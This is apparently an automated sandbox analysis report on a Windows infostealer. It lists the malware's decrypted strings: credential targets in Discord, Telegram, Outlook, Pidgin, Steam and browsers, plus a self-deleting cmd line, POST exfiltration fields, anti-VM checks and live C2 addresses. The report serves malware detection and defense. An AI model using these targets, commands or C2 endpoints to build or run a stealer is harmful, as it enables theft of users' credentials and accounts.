Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: - Country: ISO?
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: System Summary:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: - HWID:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: - OS:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: - Architecture:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: - UserName:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: - Computer Name:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: - Local Time:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: - UTC:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: - Language:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: - Keyboards:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: - Laptop:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: - Running Path:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: - CPU:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: - Threads:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: - Cores:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: - RAM:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: - Display Resolution:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: - GPU:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: User Agents:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Installed Apps:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: All Users:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Current User:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Process List:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: system_info.txt
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: freebl3.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: mozglue.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: msvcp140.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: nss3.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: softokn3.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: vcruntime140.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: \Temp\
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: .exe
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: runas
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: open
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: /c start
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: %DESKTOP%
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: %APPDATA%
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: %LOCALAPPDATA%
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: %USERPROFILE%
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: %DOCUMENTS%
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: %PROGRAMFILES%
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: %PROGRAMFILES_86%
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: %RECENT%
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: *.lnk
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: files
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: \discord\
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: \Local Storage\leveldb\CURRENT
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: \Local Storage\leveldb
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: \Telegram Desktop\
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: key_datas
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: D877F783D5D3EF8C*
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: map*
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: A7FDF864FBC10B77*
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: A92DAA6EA6F891F2*
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: F8806DD0C461824F*
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Telegram
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Tox
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: *.tox
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: *.ini
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Password
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: 00000001
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: 00000002
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: 00000003
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: 00000004
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: \Outlook\accounts.txt
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Pidgin
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: \.purple\
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: accounts.xml
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: dQw4w9WgXcQ
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: token:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Software\Valve\Steam
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: SteamPath
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: \config\
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: ssfn*
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: config.vdf
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: DialogConfig.vdf
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: DialogConfigOverlay*.vdf
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: libraryfolders.vdf
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: loginusers.vdf
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: \Steam\
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: sqlite3.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: browsers
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: done
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: soft
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: \Discord\tokens.txt
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: /c timeout /t 5 & del /f /q "
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: C:\Windows\system32\cmd.exe
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: https
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: POST
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: HTTP/1.1
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Content-Disposition: form-data; name="
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: hwid
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: build
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: token
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: file_name
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: file
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: message
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: screenshot.jpg
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: INSERT_KEY_HERE
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetProcAddress
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: LoadLibraryA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: lstrcatA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: OpenEventA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CreateEventA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CloseHandle
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Sleep
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetUserDefaultLangID
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: VirtualAllocExNuma
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: VirtualFree
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetSystemInfo
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: VirtualAlloc
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: HeapAlloc
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetComputerNameA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: lstrcpyA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetProcessHeap
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetCurrentProcess
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: lstrlenA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: ExitProcess
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GlobalMemoryStatusEx
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetSystemTime
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: SystemTimeToFileTime
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: advapi32.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: gdi32.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: user32.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: crypt32.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: ntdll.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetUserNameA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CreateDCA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetDeviceCaps
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: ReleaseDC
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CryptStringToBinaryA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: sscanf
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: VMwareVMware
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: HAL9TH
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: JohnDoe
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: DISPLAY
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: %hu/%hu/%hu
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: http://85.28.47.31
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: silence
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: /5499d72b3a3e55be.php
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: /8405906461a5200c/
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: sila
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetEnvironmentVariableA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetFileAttributesA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GlobalLock
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: HeapFree
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetFileSize
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GlobalSize
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CreateToolhelp32Snapshot
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: IsWow64Process
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Process32Next
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetLocalTime
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: FreeLibrary
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetTimeZoneInformation
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetSystemPowerStatus
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetVolumeInformationA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetWindowsDirectoryA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Process32First
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetLocaleInfoA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetUserDefaultLocaleName
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetModuleFileNameA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: DeleteFileA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: FindNextFileA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: LocalFree
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: FindClose
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: SetEnvironmentVariableA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: LocalAlloc
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetFileSizeEx
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: ReadFile
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: SetFilePointer
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: WriteFile
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CreateFileA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: FindFirstFileA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CopyFileA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: VirtualProtect
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetLastError
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: lstrcpynA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: MultiByteToWideChar
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GlobalFree
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: WideCharToMultiByte
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GlobalAlloc
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: OpenProcess
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: TerminateProcess
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetCurrentProcessId
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: gdiplus.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: ole32.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: bcrypt.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: wininet.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: shlwapi.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: shell32.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: psapi.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: rstrtmgr.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CreateCompatibleBitmap
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: SelectObject
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: BitBlt
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: DeleteObject
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CreateCompatibleDC
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GdipGetImageEncodersSize
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GdipGetImageEncoders
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GdiplusStartup
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GdiplusShutdown
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GdipSaveImageToStream
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GdipDisposeImage
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GdipFree
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetHGlobalFromStream
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CreateStreamOnHGlobal
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CoUninitialize
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CoInitialize
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CoCreateInstance
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: BCryptDecrypt
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: BCryptSetProperty
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: BCryptDestroyKey
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetWindowRect
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetDesktopWindow
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetDC
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CloseWindow
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: wsprintfA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: EnumDisplayDevicesA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetKeyboardLayoutList
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CharToOemW
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: wsprintfW
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: RegQueryValueExA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: RegEnumKeyExA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: RegOpenKeyExA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: RegCloseKey
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: RegEnumValueA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CryptBinaryToStringA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CryptUnprotectData
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: SHGetFolderPathA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: ShellExecuteExA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: InternetOpenUrlA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: InternetConnectA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: InternetCloseHandle
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: InternetOpenA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: HttpSendRequestA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: HttpOpenRequestA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: InternetReadFile
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: InternetCrackUrlA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: StrCmpCA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: StrStrA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: StrCmpCW
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00409BB0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree, 0_2_00409BB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00418940 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA, 0_2_00418940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040C660 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat, 0_2_0040C660
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00407280 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree, 0_2_00407280
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00409B10 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_00409B10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C5B6C80

Compliance
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Unpacked PE file: 20.2.624f4d727e.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Unpacked PE file: 24.2.624f4d727e.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Unpacked PE file: 34.2.624f4d727e.exe.400000.0.unpack
Uses 32bit PE files
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:49801 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:49803 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2401826383.000000006C61D000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2402076310.000000006C7DF000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2402076310.000000006C7DF000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2401826383.000000006C61D000.00000002.00000001.01000000.00000008.sdmp
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040D8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040F4F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040BCB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_004139B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0040E270
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00401710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_004143F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040DC50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA, 0_2_00414050
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0040EB60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_004133C0
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: firefox.exe Memory has grown: Private usage: 1MB later: 225MB

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://85.28.47.31/5499d72b3a3e55be.php
Source: Malware configuration extractor URLs: http://85.28.47.31silence
Source: Malware configuration extractor IPs: 185.215.113.19
Downloads executable code via HTTP
